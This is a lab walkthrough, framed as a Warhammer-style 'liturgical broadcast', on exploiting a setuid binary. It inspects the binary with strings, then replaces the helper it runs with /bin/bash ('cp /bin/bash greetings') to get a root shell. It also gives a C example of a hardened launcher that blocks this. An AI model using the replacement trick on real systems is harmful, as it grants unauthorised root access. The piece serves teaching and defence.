+++ INITIATING LITURGICAL BROADCAST +++

By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.


What is SETUID?

Setuid is an access-right flag that lets a user run a binary with the owner’s permissions.

What does this mean for us? If the binary’s owner is root and, for example, that binary runs certain commands, we can theoretically tamper with them, edit them.

This is precisely what we will explore in the following LAB.

LAB

So the lab’s goal is to get a root shell, and in the lab environment we have this.

As you can see, there is a file called welcome which displays a welcome message, and a greetings file which we can’t execute because, well, we are not root.

So I will use strings on welcome to check what it does.

student@target:~$ strings greetings
strings: greetings: Permission denied
student@target:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
greetings

This is some of the content that strings returned, and as we can observe, it executes greetings. I don’t know what greetings does or what content it has, but I don’t care: I can delete it and substitute bash for it.

cp /bin/bash greetings

Now when we execute welcome, it should spawn a bash session with root privileges.
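How the owner of welcome could close this hole, as an added example that is not the lab's source code: the substitution only works because greetings sits where an unprivileged user can delete and recreate it, so a hardened launcher refuses any helper that someone other than root could replace and runs it without a shell. The install path and the names helper_is_trusted and owner_only are assumptions made for this sketch.

```c
#define _DEFAULT_SOURCE
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical install path; the lab binary only contains the bare name "greetings". */
#define HELPER "/usr/local/libexec/greetings"

/* 1 if the object is owned by `trusted` and not writable by group or other. */
static int owner_only(const struct stat *st, uid_t trusted) {
    return st->st_uid == trusted && (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* 1 if `path` is an absolute path to a regular file that only `trusted`
 * can modify or replace. Checks the file and its directory, not every
 * ancestor, so install the helper under a root-owned tree. */
int helper_is_trusted(const char *path, uid_t trusted) {
    char dir[PATH_MAX];
    struct stat st;
    const char *slash = strrchr(path, '/');

    if (path[0] != '/' || strlen(path) >= sizeof dir) return 0;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0; /* no symlinks */
    if (!owner_only(&st, trusted)) return 0;

    /* Whoever can write the directory can delete and recreate the file,
     * whatever the file's own mode says. */
    size_t n = (slash == path) ? 1 : (size_t)(slash - path);
    memcpy(dir, path, n);
    dir[n] = '\0';
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    return owner_only(&st, trusted);
}

int main(void) {
    char *const argv[] = { "greetings", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    if (!helper_is_trusted(HELPER, 0)) {
        fprintf(stderr, "refusing to run %s: replaceable by non-root\n", HELPER);
        return 1;
    }
    if (setuid(0) != 0) { perror("setuid"); return 1; }
    execve(HELPER, argv, envp);   /* no shell, no PATH lookup, fixed environment */
    perror("execve");
    return 1;
}
```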


GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.

+++ LITURGICAL BROADCAST COMPLETE +++